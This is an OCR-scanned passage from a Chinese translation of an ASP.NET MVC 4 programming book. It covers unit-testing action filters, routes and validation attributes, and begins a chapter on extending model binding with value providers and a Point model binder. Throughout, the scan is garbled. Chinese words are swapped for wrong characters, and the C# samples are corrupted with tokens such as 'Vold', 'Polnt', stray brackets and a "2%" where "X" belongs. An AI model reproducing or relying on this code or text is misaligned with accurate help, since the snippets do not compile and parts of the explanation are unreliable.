会 在 合适 的 时 候 查 找 和 运行 它 。 因 为 操作 过 滤器 被 附加 到 的 方法 正在 运行 ， 所 以 对 于 使 它 
们 运行 的 特性 没有 什么 神奇 的 。 

当 运 行 单 元 测试 中 的 操作 时 ， 请 记 住 ， 不 要 依赖 于 操作 过 滤器 的 执行 。 这 可 能 稍微 会 
使 操作 方法 中 的 逻辑 复杂 化 ， 而 复杂 程度 取决 于 操作 过 滤器 所 做 的 具体 工作 。 例 如 ， 如 果 
过 小 右 问 ViewBag 属性 添加 数据 , 那么 当 操 作 在 测试 下 运行 时 , 要 添加 的 数据 是 不 存在 的 。 
因此 ， 我 们 需要 意识 到 单元 测试 和 控制 器 本 身 的 事实 。 

本 节 标 题 中 的 忠告 建议 操作 过 滤器 的 使 用 应 限于 正 交 活动 ， 之 所 以 这 样 ， 是 因为 操作 
过 滤器 在 单元 测试 环境 中 不 能 运行 。 如 果 操 作 过 滤器 正在 进行 使 操作 执行 的 关键 步骤 ， 那 
么 这 些 代 码 可 能 应 该 放 在 其 他 地 方 ， 比 如 一 个 辅助 类 中 ， 而 不 是 一 个 过 滤器 特性 中 。 


13.3.2 ”路 由 测试 


- 旦 了 解 到 所 有 基础 结构 所 在 的 正确 位 置 ， 路 由 测试 就 会 变 成 一 个 十 分 倘 单 的 过 程 。 
因为 路 由 使 用 的 是 ASPNET 核心 基础 结构 ， 所 以 我 们 会 采用 Moq 来 编写 蔡 代 程序 。 
默认 的 ASPNET MVC 项 目 模 板 会 在 global.asax 文件 中 注册 两 个 路 由 : 
public static Vold RegisterRoutes (RouteCollection routes) 


{ 


routes.IgnoreRoute("{resource} .axd/{*pathIinfo}™");} 


TOUtesS .MapRoute 
"Default™, 
"{controller}/{action}/{id}", 
new { controller = "Home", action = "Index", id = UrlParameter.Optional 
} 
); 
} 
使 用 ASPNET MVC 工具 把 注册 函数 创建 为 一 个 公共 静态 函数 是 非常 方便 的 ， 也 就 是 
说 ， 我 们 可 以 非常 容易 地 从 一 个 带 有 RouteCollection 实例 的 单元 测试 中 调用 它 ， 并 用 它 来 
把 所 有 路 由 映射 到 集合 中 ， 以 便 检查 和 执行 。 
在 测试 这 些 代码 以 前 , 还 需要 学 习 一 些 路 由 的 知识 。 有 关 路 由 的 内 容 在 第 9 章 已 经 做 过 
相应 的 介绍 ， 现 在 需要 重点 理解 基本 路 由 注册 系统 的 工作 原理 。 如 果 观 察 RouteCollection 
类 上 的 Add 方法 ， 会 注意 到 ， 它 采 用 -个 名 称 和 -个 RouteBase 类 型 的 实例 作为 参数 : 


public void Addl{(string name, RouteBase item) 
RouteBase 是 一 个 抽象 类 ， 它 的 主要 作用 是 将 传 入 的 请 求 数据 映射 到 路 由 数据 中 : 
public abstract RouteData GetRouteData (HttpContextBase httpContext) 


ASPNET MVC 应 用 程序 通常 不 直接 使 用 Add 方法 ， 而 是 直接 调用 MapRoute 方法 
(ASPNET MVC 框架 提供 的 一 个 扩展 方法 )。 在 MapRoute 方法 内 部 ，ASPNET MVC 框架 
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本 身 使 用 一 个 合适 的 RouteBase 对 象 调 用 Add 方法 。 从 使 用 角度 来 看 ， 我 们 只 需 关心 返回 
的 RouteData 结果 ; 具体 地 说 ， 我 们 想 知 道 调用 了 哪个 处 理 程序 ， 返 回 的 路 由 结果 数据 值 
是 什么 。 


1. 测试 lIgnoreRoute 函数 调用 
下 和 而 开始 IgnoreRoute 调用 ， 并 编写 一 个 在 操作 展示 的 测试 程序 : 


[TestMethod | 

public void RouteForEmbeddedResource() 

{ 
// Arrange 
Var mockContext = new Mock<HttpContextBase> ();}; 
mockContext.Setupl(c => Cc.Request .AppRelativeCurrentExecutionF1ilePath) 

.Returns ("~/handler.axd"™),， 

Var routes = new RouteCollection(); 
MycApplication.RegisterRoutes (routes);} 


// Ac 
RouteData routeData = routes.GetRouteData (mockContext.Object)}); 


// Assert 
Assert.IsNotNull] (routeData);}; 
Assert.IsInstanceoifType (routeData.RouteHandler., 
typeof (StopRoutingHandler) ) 
} 


Arrange 部 分 创建 了 一 个 HttpContextBase 类 型 的 模拟 容 句 。 因 为 路 由 需要 知道 请 求 的 
URL 是 什么 , 所 以 它 调 用 了 Request.AppRelativeCurrentExecutionFilePath。 我 们 所 需要 做 的 
是 ,告诉 Mog 每 当 调 用 该 方法 时 ， 返 回想 要 测试 的 URL。 剩 余 的 Arrange 部 分 创建 了 一 个 
空 的 路 由 集合 ， 并 请 求 应 用 程序 把 它 的 路 由 注册 到 该 集合 中 。 

然后 Act 部 分 要 求 路 由 从 请 求 数据 中 获取 路 由 数据 , 并 返回 一 个 RouteData 实例 。 如果 
没有 匹配 的 路 由 ，RouteData 实例 就 会 为 宇 ， 因 此 ， 第 一 个 测试 是 要 确保 存在 匹配 路 由 。 
对 于 该 测试 ， 不 必 关 心 任 何 路 由 数据 值 ， 而 只 需 知 道 命 中 一 个 忽略 路 由 (ignore route), 之 
所 以 这 样 ， 是 因为 路 由 处 理 程 序 是 System.Web.Routing.StopRoutingHandler 的 一 个 实例 。 


2. 测试 MapRoute 函数 调用 


由 于 这 些 是 与 应 用 程序 功能 实际 匹配 的 路 由 ， 因 此 MapRoute 函数 调用 的 测试 可 能 会 
更 有 趣 。 虽 然 默认 只 有 一 个 路 由 ， 但 是 传 入 的 URL 中 可 能 存在 多 个 与 该 路 由 相 匹 配 。 
第 一 个 测试 确保 传 入 的 首页 请 求 能 够 映射 到 默认 的 控制 医 和 操作 : 
[TestMethod | 
public void RouteToHomePage () 


{ 


Var mockContext = new Mock<HttpContextBase> ();}; 
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mockContext.Setup{(c => C.Reduest .AppRelativeCcurrentExecutionFilePath,) 
.Returns ("~/"); 

Var routes = new RouteCollection () ， 

RouteConfig.RegisterRoutes (routes)}); 


RouteData routeData = routes.GetRouteData (mockContext .Object);} 


Assert.IsNotNull (routeData); 

Assert.AreEqual ("Home", routeData.Values|["controller" |); 

Assert.AreEqual ("Index", routeData.Values|["action™|); 

Assert.AreEqual (UrlParameter.Optional, routeData.Values["id"|]); 
} 

不 像 刚 才 的 忽略 路 由 测试 ， 该 测试 需要 知道 路 由 内 部 的 数据 值 。 路 由 系统 填充 
controller、action 和 id 的 值 。 因 为 该 路 由 有 三 个 可 蔡 换 的 部 分 ， 所 以 这 里 需要 使 用 4 个 测 
试 ， 它们 的 数据 和 结果 可 能 如 表 13-1 所 示 。 如 果 单 元 测试 框架 支持 数据 驱动 测试 ， 那 么 路 
由 将 是 利用 这 些 功能 的 不 二 选择 。 


表 13-1 黑 认 路 由 映射 示例 
J i 
~/Help Uriparameter Optional 
~/Help/List UrlParameter.Optional 
JHalp/Topicn 2 


3. 不 匹配 路 由 的 测试 


不 需要 对 不 匹配 路 由 编写 测试 代码 。 到 现在 为 止 编写 的 测试 都 是 自己 编写 的 代码 测 
试 ; 也 即 调用 IgnoreRoute 或 MapRoute 方法 。 如 果 为 不 匹配 路 由 编写 测试 ， 我 们 只 需 在 该 
点 上 测试 路 由 。 可 以 假设 它 能 够 正确 运行 。 


13.3.3 ”验证 测试 


ASPNET MVC 中 的 验证 系统 利用 了 .NET 框架 中 的 Data Annotations 库 ， 其 中 包括 实 
现 了 IValidatableObject 接口 的 目 验 证 对 象 ， 和 基于 上 下 文 的 验证 ， 访 验证 允许 验证 器 访 问 
包含 验证 属性 的 “容器 ”对 象 。MVC 使 用 IClientValidatable 接口 对 验证 系统 进行 了 扩展 ， 
这 样 吉 可 以 在 客户 疹 验 证 中 使 用 验证 特性 。 除了 内 置 的 DataAnnotations 验证 特性 外 , MVC 
还 添加 了 两 个 新 的 验证 器 :， CompareAttribute 和 RemoteAttribute。 

客户 端的 变化 是 巨大 的 。ASPNET MVC 团队 添加 了 对 非 侵 入 式 验证 的 支持 ， 从 而 可 以 实 
现 将 验证 规则 作为 HTML 元 素 而 不 是 内 和 嵌 的 JavaScript 代码 来 泻 染 。MVC 是 ASPNET 团队 
承诺 的 第 一 个 充分 结合 了 JavaScript 中 jQuery 家 族 的 框架 。 尽 管 非 侵入 式 验 证 特性 以 独立 
于 框架 的 形式 来 实现 ， 但 是 实现 使 用 的 MVC 则 基于 jQuery 和 jQuery Validate。 
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开发 人 员 经 间 编 写 新 的 验证 规则 ， 大 部 分 应 用 都 会 很 快 超过 内 置 的 4 个 验证 规则 
(Required、Range、ReegularExpression 和 StringLength)。 我 们 如 果 编 写 验 证 规则 ， 还 需要 编 
写 相 应 的 服务 侨 端 验证 代码 , 这 些 验证 代码 可 以 由 服务 器 端的 单元 测试 框架 来 测试 。 此 外 ， 
可 以 使 用 服务 器 端 单元 测试 框架 来 测试 IClientValidatable 接口 的 元 数据 API， 以 确保 该 规 
则 发 出 正确 的 客户 端 规则 。 一 旦 熟悉 了 数据 注解 验证 系统 的 工作 原理 ， 为 这 些 代码 片段 编 
写 单元 测试 是 比较 简单 的 。 


客户 端 (JAVASCRIPT) 单 元 测试 


如 果 没 有 与 验证 规则 合理 匹配 的 相应 客户 问 规 则 ， 开 发 人 员 可 能 会 选择 编写 一 小 段 


JavaScript 代码 ,并 且 这 些 JavaScript 代码 可 以 使 用 客户 端 单元 测试 框架 ( 像 QUnit, 由 jQuery 
团队 开发 的 单元 测试 框架 ) 进 行 单元 测试 。 为 客户 痕 JavaScript 代 但 编写 单元 测试 超出 了 本 
章 的 讨论 范围 。 但 笔者 鼓励 开发 人 员 花 一 些 时 间 为 目 己 的 JavaScript 代码 找到 一 个 好 的 客 
户 闪 单元 测试 系统 。 


一 个 验证 特性 派生 于 名 称 空间 System.ComponentModel.DataAnnotations 中 的 基 类 
ValidationAttribute。 实 现 验 证 逻辑 也 就 是 重 写 两 个 IsValid 方法 中 的 一 个 。 束 像 前 面 第 6 章 
中 最 大 单词 数 验证 器 ， 其 开始 代码 如 下 所 示 : 

public class MaxWordsAttribute : ValidationAttribute 
{ 
protected override ValidationResult IsValidl 
object value, ValidationContext validationContext) 
{ 
return ValidationResuilt.Success; 
} 
} 


验证 特性 拥有 作为 参数 传递 给 它 的 验证 上 下 文 。 这 是 .NET 4 的 数据 注解 库 中 的 新 重 
载 。 当 然 也 可 以 重 写 .NET 3.5 的 数据 注解 验证 API 中 原始 的 IsValid 版 本 : 


public class MaxWordsAttribute : ValidationAttribute 


{ 
public override bool IsValidl(object value) 
{ 
return trues 
} 
} 


具体 选择 哪个 API 取决 于 是 否 需 要 访问 验证 上 下 文 。 验 证 上 下 文 可 以 用 来 与 包含 值 的 
容器 对 象 进 行 交 互 。 当 考虑 单元 测试 时 ， 这 是 一 个 问题 ， 因 为 任何 使 用 验证 上 下 文中 信息 
的 验证 器 都 需要 一 个 验证 上 下 文 。 如 果 验 证 器 重 写 了 没有 验证 上 下 文 的 IValid 版 本 ,那么 
可 以 调用 它 上 面 只 需要 模型 值 和 参数 名 称 的 Validate 版 本 。 

另 一 方面 ， 如 果实 现 了 包含 验证 上 下 文 的 IsValid 版 本 (并 且 需 要 验证 上 下 文中 的 值 )， 
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就 必须 调用 包含 验证 上 下 文 的 Validate 版 本 ; 否则 ，IsValid 中 的 验证 上 下 文 融 是 空 的 。 从 
理论 上 讲 ， 任 何 IsValid 的 实现 必须 是 有 弹性 的 ， 以 防 调用 时 没有 验证 上 下 文 ， 因 为 调用 它 的 
代码 很 有 可 能 是 使 用 .NET 3.5 数据 注解 API 编写 的 ; 不 过 在 实际 应 用 中 , 在 ASPNET MVC 3 
及 其 以 后 版 本 中 使 用 的 验证 器 ， 就 可 以 确定 它们 总 会 有 一 个 验证 上 下 文 。 

这 就 意味 着 当 编 写 单元 测试 时 , 我 们 需要 给 验证 器 提供 一 个 验证 上 下 文 (最 起 码 要 在 知 
道 这 些 验证 器 在 使 用 验证 上 下 文 时 提供 ， 但 在 实际 应 用 中 ， 最 好 总 是 提供 验证 上 下 文 )。 

正确 地 创建 ValidationContext 对 象 是 非常 环 手 的 。 有 几 个 成 员 需 要 正确 地 设置 以 便 验 
证 器 使 用 。ValidationContext 的 构造 函数 需要 三 个 参数 : 要 被 验证 的 模型 实例 、 服 务 容器 
和 项 集合 。 这 三 个 参数 中 只 有 模型 实例 是 必要 的 ; 其 他 两 个 应 该 是 null， 因 为 在 ASPNET 
MVC 应 用 程序 中 不 使 用 这 两 个 参数 。 

ASPNET MVC 可 以 做 两 个 不 同 的 验证 : 模型 级 别 验 证 和 属性 级 别 验证 。 模 型 级 别 验 
证 在 模型 对 象 作为 一 个 整体 被 验证 时 执行 ( 即 验证 特性 置 于 类 上 ):， 属性 级 别 的 验证 在 验证 
模型 的 单个 属性 时 执行 ( 即 验 证 特性 置 于 模型 类 的 内 部 属性 上 )。ValidationContext 对 象 在 每 
个 情形 中 都 有 不 同 的 设置 。 

当 执 行 模 型 级 别 的 验证 时 ， 单 元 测试 对 ValidationContext 对 象 的 设置 如 表 13-2 所 示 ; 
当 执 行 属性 级 别 的 验证 时 ， 单 元 测试 使 用 表 13-3 所 示 的 验证 规则 。 


表 13-2 模型 验证 的 验证 上 下 文 


属 性 内 容 

DisplayName 用 在 错误 提示 设置 消 恩 中 ， 用 来 蔡 换 {0}。 对 于 模型 验证 ， 通 常 指 类 型 的 简单 名 
称 ( 即 不 带 名 称 空间 前 缀 的 类 名 ) 

Items 不 应 用 于 ASP.NET MVC 应 用 程序 

MemberName 不 应 用 于 模型 验证 

ObjectInstance 传递 到 构造 函数 的 值 ， 要 验证 模型 的 实例 。 注 意 ， 这 与 传递 给 Validate 的 值 是 
同一 个 值 

ObjectType 要 验证 模型 的 类 型 。 上 自动 设置 为 与 传递 到 ValidationContext 构造 函数 对 象 相 匹 
配 的 类 型 


ServiceContainer 不 应 用 于 ASP.NET MVC 应 用 程序 


表 13-3 属性 验证 的 验证 上 下 文 


属 性 内 容 
DisplayName 用 在 错误 提示 消 虫 中， 用 来 蕉 换 {0}。 对 于 属性 验证 ， 通 常 指 属性 的 名 称 ， 尽 管 
它 可 能 被 像 [Display] 或 [DisplayName] 这 样 的 特性 影响 
Items 不 应 用 于 ASP.NET MVC 应 用 程序 
MemberName 包含 要 验证 的 属性 的 真实 名 称 。 不 像 DisplayName， 用 于 显示 目的 ， 该 属性 是 


它 出 现在 模型 类 中 的 精确 属性 名 称 
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( 续 表 ) 
属 性 内 容 
ObjectInstance 传递 到 构造 函数 的 值 ， 位 于 包含 要 验证 属性 的 模型 实例 中 。 不 像 模 型 验证 的 情 
形 ， 它 与 要 传递 到 Validate 的 值 不 同 ， 因 为 传递 到 Validate 的 值 是 属性 值 
ObjectType 要 验证 模型 的 类 型 ， 而 不 是 要 验证 属性 的 类 型 。 自 动 设置 为 与 传递 到 


ValidationContext 构造 函数 对 象 相 匹 配 的 类 型 
ServiceContainer 不 应 用 于 ASP.NET MVC 应 用 程序 


让 来 看 看 每 个 场景 中 的 一 些 示例 代码 。 下 面 的 代码 展示 了 如 何 初 始 化 模型 级 别 单元 测 
试 的 验证 上 下 文 (假设 正在 测试 一 个 名 为 ModelClass 的 假设 类 实例 ): 
Var model = new ModelClass { /* initialize properties here */ }; 
Var context = new ValidationContext (model, null, null) 1{ 
DisplayName = model .GetType () .Name 
}; 


Var validator = new ValidationAttributeUnderTest () ， 


validator.Validate (model, context).,; 


在 测试 内 部 ， 如 果 存 在 错误 ，Validate 调用 将 抛 出 ValidationException 类 的 一 个 实例 。 
当期 望 验证 失败 时 ， 应 该 用 一 个 try/catch 代码 块 环 绕 Validate 调用 ， 或 者 使 用 测试 框架 的 
优先 方法 来 进行 异常 测试 。 

现在 展示 属性 级 别 测试 的 代码 。 假 设 正 在 测试 ModelClass 模型 上 的 FirstName 属性 ， 
则 测试 代码 如 下 所 示 : 


Var model = new ModelClass { FirstName = "Brad™ 1}; 

Var context = new ValidationContext (model, null, null) 1{ 
DisplayName = "The First Name", 
MemberName = "FirstName" 

}; 


Var validator = new ValidationAttributeUnderTest () ， 


validator.Validate (model .FirstName, context);} 


对 比 前 面 的 模型 级 别 示 例 ， 有 两 个 关键 的 不 同 之 处 : 
e 第 一 ， 设 置 MemberName 属性 值 来 匹配 属性 名 称 ， 而 模型 级 别 验证 示例 没有 设 管 
任何 MemberName 属性 值 。 
。 第 二 ， 在 调用 Validate 时 ， 要 测试 属性 的 值 传递 给 Validate， 而 在 模型 级 别 验证 示 
例 中 ， 是 把 模型 本 号 传 递 给 Validate。 
当然 ， 如 果 知 道 验证 特性 需要 访问 验证 上 下 文 ， 那么 所 有 这 些 代 码 就 都 是 必要 的 。 如 
果 知 道 特性 不 需要 验证 上 下 文 信息 ， 那 么 使 用 简单 的 只 需要 对 象 值 和 显示 名 称 的 Validate 
方法 即 可 。 这 两 个 值 分 别 和 传递 到 ValidationContext 构造 函数 的 值 以 及 设置 到 验证 上 下 文 
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的 DisplayName 属性 中 的 值 相 匹配 。 
13.4 ”小 结 
本 章 前 半 部 分 简要 介绍 了 单元 测试 和 测试 驱动 开发 。 通 过 学 习 ， 我 们 应 该 对 高 效 的 单 


元 测试 机 制 有 一 个 全 面 理解 。 后 半 部 分 提供 了 一 些 真实 的 指导 ， 阐 述 了 当 为 ASPNET MVC 
应 用 程序 编写 单元 测试 时 ， 应 该 做 以 及 应 该 避免 的 事项 ， 从 而 增强 了 理论 知识 。 


La 


扩展 ASP.NET MVC 


本 章 主 要 内 容 

e 模型 的 扩展 方法 
e 视图 的 扩展 方法 
e 控制 器 的 扩展 方法 


第 1 章 中 曾 强 调 层 在 ASPNET 框架 中 的 重要 性 。 在 2002 年 ，ASPNET 1.0 发 布 时 ， 
大 部 分 人 不 能 将 核心 运行 时 ( 即 名 称 空间 System.Web 中 的 类 ) 和 ASPNET Web Forms 应 用 程 
序 平 台 ( 即 名 称 空间 System.Web.UI 中 的 类 ) 区 分 开 来 。ASPNET 开发 团队 在 简单 的 核心 
ASPNET 运行 时 抽象 之 上 创建 了 复杂 的 Web Forms 抽象 。 

ASPNET 团队 的 一 些 新 技术 建立 在 核心 运行 时 之 上 ， 其 中 包括 ASPNET MVC 4。 因 
为 ASPNET MVC 框架 建立 在 公共 抽象 之 上 , 所 以 ASPNET MVC 框架 能 实现 的 任何 功能 ， 
任何 人 (Microsoft 公司 内 部 或 外 部 的 人 员 ) 也 都 可 以 实现 。 出 于 同样 的 原因 ，ASPNET MVC 
框架 本 身 也 由 者 干 层 抽 象 组 成 ， 从 而 使 得 开发 人 员 能 够 选择 他 们 需要 的 MVC 片段 ， 蔡 换 
或 修改 扩展 他 们 不 需要 的 片段 。 对 于 每 个 后 续 版 本 ，ASPNET MVC 团队 都 开放 了 更 多 的 
框架 内 部 定制 点 。 

一 些 开 发 人 员 不 需要 了 解 平 台 的 底层 扩展 ， 因 为 他 们 最 多 通过 ASPNET MVC 的 第 三 
方 扩展 间接 地 来 使 用 这 些 扩展 。 至 于 其 他 ， 这 些 定 制 点 的 可 用 性 在 决定 如 何在 应 用 程序 中 
充分 利用 MVC 方面 起 看 关键 性 作用 。 本 章 将 深入 讲解 如 何 将 MVC 片段 连接 在 一 起 ， 以 
及 我 们 设计 用 于 插入 、 补 充 或 替换 的 地 方 。 
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本 章 中 所 有 的 示例 源 代 码 都 可 在 名 为 Wrox.ProMvc4.ExtendingMvc 的 
NuGet 包 中 获取 。 采 用 Basic 模板 创建 一 个 ASPNET MVC 应 用 程序 ， 并 添加 
NuGet 包 , 就 可 以 得 到 一 个 本 章 所 讨论 功能 的 完整 示例 。 本 章 只 展示 了 示例 代 
码 的 重要 部 分 ， 因 此 ， 阅 读 NuGet 包 中 的 完整 源 代码 是 理解 这 些 扩展 工作 原 


14.1 模型 扩展 


ASPNET MVC 4 中 的 模型 系统 包含 几 个 可 扩展 部 分 ， 其 中 包括 使 用 元 数据 描述 模型 、 
验证 模型 以 及 影响 从 请 求 数据 中 构造 模型 的 能 力 。 下 面 对 系 统 中 的 每 个 可 扩展 点 ， 都 列举 
相应 的 一 个 示例 。 


14.1.1 把 请 求 效 据 转化 为 模型 


将 请 求 数据 (比如 表单 数据 、 得 询 字 符 串 数据 或 路 由 信息 ) 转 换 为 模型 的 过 程 称 为 模型 
绑 定 。 模 型 绑 定 的 过 程 分 为 两 个 阶段 : 

e 通过 使 用 值 提 供需 理解 数据 的 来 源 

e 使 用 这 些 值 创建 /更 新 模型 对 和 象 ( 通 过 使 用 模型 绑 定 器 ) 


1. 使 用 值 提 供 器 解析 请 求 数 据 


当 ASPNET MVC 应 用 程序 参与 模型 绑 定 时 ， 真 实 模型 绑 定 过 程 使 用 的 值 都 来 自 值 提 
供 器 。 值 提供 器 的 作用 仅仅 是 访问 能 够 在 模型 绑 定 过 程 中 正确 使 用 的 信息 。ASPNET MVC 
框架 自 带 的 若干 值 提供 器 可 以 提供 以 下 数据 源 中 的 数据 : 

e 了 于 操作 (RenderAction) 的 显 式 值 

e 表单 值 

e 来自 义 MLHttpRequest 的 JSON 数据 

e 路 由 值 

e 查询 字符 串 值 

e 上 传 的 文件 

值 提供 器 来 自 值 提供 堪 工 上 ,并 且 系 统 按照 值 提 供 堪 的 注册 顺序 来 从 中 搜寻 数据 (上 面 
的 列表 使 用 的 是 默认 顺序 ， 目 上 而 下 )。 开 发 人 员 可 以 编写 目 己 的 值 提供 器 工厂 和 值 提 供 器 ， 
并 且 还 可 以 把 它们 插入 到 包含 在 ValueProviderFactories Factories 中 的 工厂 列表 中 。 当 在 模 
型 绑 定 期 间 需 要 使 用 额外 的 数据 源 时 ， 开 发 人 员 通 第 选择 编写 自己 的 值 提 供需 工 片 和 值 提 
供 器 。 

除了 ASPNET MVC 本 身 包含 的 值 提供 器 工厂 以 外 ， 开 发 团队 也 在 ASPNET MVC 
Futures 包 中 包含 了 一 些 提 供 器 工厂 和 值 提供 器 。 有 具体 包括 以 下 提供 器 : 
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e Cookie 值 提 供需 

e 服务 器 变量 值 提供 需 

e Session 值 提供 器 

e TempData 值 提供 器 

Microsoft 已 经 开源 了 MVC 所 有 内 容 , 包括 MVC Futures 包 ，, 网址 http://aspnetwebstack. 
codeplex.com/， 通 过 这 个 网 站 我 们 可 以 学 习 创 建 目 己 的 值 提供 器 和 工厂 。 


2. 创建 带 有 模型 绑 定 器 的 模型 


模型 扩展 的 另 一 部 分 是 模型 绑 定 右 。 它 们 从 值 提 供需 系统 中 获取 值 ， 并 利用 获取 的 值 创建 
新 模型 或 者 填充 已 有 模型 。ASPNET MVC 中 的 默认 模型 绑 定 颖 (为 方便 起 见 ， 命 名 为 
DefaultModelBindeD 是 一 段 功能 非 贡 强大 的 代码 ， 它 可 以 对 传统 基 、 集 合 类 、 列 表 、 数 组 
甚至 字典 进行 模型 绑 定 。 
默认 模型 绑 定 磺 不 支持 不 可 变 对 象 : 对 和 象 的 初始 值 必须 通过 构造 函数 设置 ， 之 后 不 能 
改变 。~/Areas/ModelBinder 中 的 模型 绑 定 需 示 例 代码 包括 CLR 中 Point 对 象 的 模型 绑 定 堪 
的 源 代码 。 由 于 Point 类 是 不 可 变 的 ， 因 此 我 们 必须 使 用 它 的 值 构造 一 个 新 实例 : 
public class PointModelBinder : IModelBinder I 
public object BindModel (ControllerContext controllerContext, 
ModelBindingContext bindingContext) I 
var valueProvider = bindingContext .ValueProvider; 
int x = (int)})valueProvider.GetValue("X") .ConvertTo (typeof (int))}); 
int vy = (int}valueProvider.GetValue("Y") .ConvertTo (typeof (1nt)); 
return new Point (x, vy); 
} 
当 创建 一 个 新 的 模型 绑 定 右 时 ， 我 们 需要 告知 ASPNET MVC 框架 存在 一 个 新 的 模型 
绑 定 器 以 及 何 时 使 用 它 。 可 以 使 用 [ModelBinder] 特 性 来 装饰 绑 定 类 , 也 可 以 在 ModelBinders. 
Binders 的 全 局 列表 中 注册 新 的 模型 绑 定 需 。 
模型 绑 定 吉 往往 容易 被 忽略 的 一 个 责任 是 : 验证 它们 要 绑 定 的 值 。 前 面 的 示例 代码 未 
有 包含 任何 验证 届 辑 ， 因 此 看 上 去 非 彰 简单， 而 完整 的 示例 代码 则 包含 对 验证 的 文 持 ， 但 
这 将 使 得 示例 过 度 复杂 。 在 一 些 情形 中 ， 由 于 知道 模型 绑 定 要 绑 定 的 类 型 ， 因 此 文 持 泛 型 
验证 可 能 就 变 得 不 必要 (因为 我 们 可 以 直接 将 验证 多 辑 硬 编 公 到 模型 绑 定 右 中 ): 对 于 广义 
的 模型 绑 定 器 ， 我 们 可 以 使 用 内 置 的 验证 系统 来 查找 用 户 提供 的 验证 堪 ， 进 而 确保 模型 的 
正确 性 。 
在 与 NuGet 包 中 代码 相 匹 配 的 扩展 示例 中 ,我 们 看 到 了 一 个 更 完整 的 模型 绑 定 右 版 本 。 
BindModel 的 新 实现 看 起 来 仍然 比较 简单 ， 因 为 我 们 把 所 有 的 检索 、 转 换 和 验证 逻辑 移 到 
了 一 个 辅助 方法 中 : 


public object BindModel (ControllerContext controllercCcontext, 
ModelBindingContext bindingContext) { 
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1 (1!1StrlInod-.ISNULLOTFTEmpty (bindingContext.ModelName) EE& 
IbInadlIngContext .ValueProvider.ContainsPrefix (bindingContext.Model 
Name)) 


if (‘bindingContext.FallbackToEmptyPref1ix) 
return null; 


bindingContext = new ModelBindingContext { 
ModelMetadata = bindingContext .ModelMetadata, 
Modelstate = bindingContext.Modelstate, 
PropertyFilter = bindingContext.PropertyFilter, 
ValueProvider = bindingContext .ValueProvider 
}; 
} 


bindingContext.ModelMetadata.Model = new Polnt (); 


return new Point( 
Get<int> (controllerContext, bindingContext, "2%"), 
Get<int> (controllerContext, bindingContext, "Y") 

| ); 

上 面 的 代码 在 原来 的 BindModel 版 本 基础 上 添加 了 两 项 新 内 容 : 

e 第 一 项 新 内 容 是 第 一 个 让 代 但 块 , 它 试图 在 回落 到 空前 级 之 前 找到 市 有 名 称 前 级 的 
值 。 当 系统 开始 模型 绑 定 时 ， 模 型 参数 名 称 ( 在 示例 控制 占 是 pb 被 设置 为 binding 
Context.ModelName 中 的 值 。 碍 看 值 提供 器 ， 以 确定 它们 是 否 包 舍 以 pt 开头 的 子 值 ， 
如 果 是 ， 那 么 它们 就 是 要 使 用 的 值 。 假 如 拥有 一 个 名 为 pt 的 参数 ， 那 么 使 用 的 值 
的 名 称 应 该 是 pt.X 和 pt.Y 而 不 是 只 有 和 X， 或 只 有 Y。 然 而 ， 如 果 找 不 到 以 pt 开头 
的 值 ， 就 击 要 使 用 名 称 中 只 有 六 或 只 有 的 值 。 

e 在 ModelMetadata 中 设置 了 一 个 Point 对 象 的 空 实例 。 之 所 以 这 样 做 ， 是 因为 大 部 
分 验证 系统 包括 DataAnnotations， 都 期 望 看 到 一 个 容器 对 象 的 实例 ,即便 里 面 不 存 
放任 何 实际 的 值 。 由 于 Get 方法 调用 验证 ， 因 此 我 们 需要 提供 给 验证 系统 一 个 茶 种 
类 型 的 容 大 对象， 即便 知 逢 它 不 是 最 终 容 需 。 

Get 方法 有 几 个 片段 。 下 面 是 它 的 整个 函数 ， 后 面 将 对 其 进行 分 析 : 

private TModel Get<TModel> (ControllerContext controllerConteXt ， 


ModelBindingContext bindingCcontext, 
string name) | 


string fullName = name; 


if (!String.IsNullorWhiteSspace (bindingContext.ModelName)) 
fullName = bindingContext.ModelName + ".™” + name; 
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ValueProviderResult wvalueProviderResult = 
bindingContext .ValueProvider.GetValue (fullName); 


Modelstate modelstate = new Modelstate { Value = VvalueProviderResult |， 
bindingContext.Modelstate.Add (fullName, modelstate),; 


ModelMetadata metadata = bindingContext.PropertyMetadata[lname|; 


string attemptedValue = valueProviderResult.AttemptedValue; 
ift (metadata.ConvertEmptyStringToNull 
&& String.IsNullorWwhiteSpace (attemptedValue)) 
attemptedValue = null; 


TModel model.; 
bool invalidValue = false:; 


try 
{ 
model = (TModel)valueProviderResult.ConvertTo (typeof (TModel));} 
metadata.Model = model; 
} 
catch (Except1ion) 
{ 
model = default (TModel);}; 
metadata.Model = attemptedValue; 
invalidVvalue = true; 


IEnumerable<ModelValidator> validators = 
ModelValidatorProviders.Providers.GetValidators!l 
metadata, 
controllerCcontext 


上 


foreach (Var validator in validators) 
foreach (var validatorResult in 
validator.Validate (bindingContext .Model)) 
modelstate.Errors.Add(validatorResult.Message); 


if (invalidValue && modelstate.Errors.Count == 0) 
modelstate.Errors.Addl 
String.Format ( 
"The value {0}" is not a valid value for {1}.", 
attemptedValue, 
metadata.GetDisplayName () 


); 


return model: 


337 


338 


ASPNET MVC 4 高 级 编程 (第 4 版 ) 


下 面 逐 行 分 析 上 述 代 但 : 

(1) 第 一 件 事情 就 是 从 值 提供 器 中 检索 尝试 值 ， 并 在 模型 状态 中 记录 ， 以 便 用 户 可 以 
看 到 他 们 的 输入 值 ， 即 便 输 入 值 是 在 模型 中 不 能 直接 包含 的 内 容 。 例 如 ， 用 户 在 只 允许 输 
入 整数 的 字段 输入 abc: 

string fullName = name; 


1if (‘String.IsNullOrwhiteSpace (bindingContext .ModelName)) 
fullName = bindingContext.ModelName + "." + name; 


ValueProviderResult walueProviderResult = 
bindingContext.ValueProvider.GetValue (fullName); 


Modelstate modelstate = new Modelstate { Value = VvalueProviderResult 1; 
bindingContext .ModelState.Add (fullName, modelstate); 


在 进行 深层 模型 绑 定 的 事件 中 ， 完 全 限定 名 会 预先 挂 起 prepend) 当 前 模型 名 称 。 如 果 
决定 在 另 一 个 类 ( 像 视 图 模型 ) 的 内 部 使 用 一 个 Point 类 型 的 属性 ， 这 可 能 就 会 发 生 。 

(2) 一 旦 得 到 值 提供 器 的 返回 结果 ， 我 们 就 必须 获得 一 个 描述 该 属性 模型 元 数据 的 副 
本 ， 然 后 再 决定 用 户 输 入 值 的 内 容 : 


ModelMetadata metadata = bindingContext.PropertyMetadata [name | :， 


string attemptedValue = valueProviderResult.AttemptedValue; 
if (metadata.ConvertEmptySsStringToNull 
&& String.l1sNullorwhiteSpace (attemptedValue)}) 
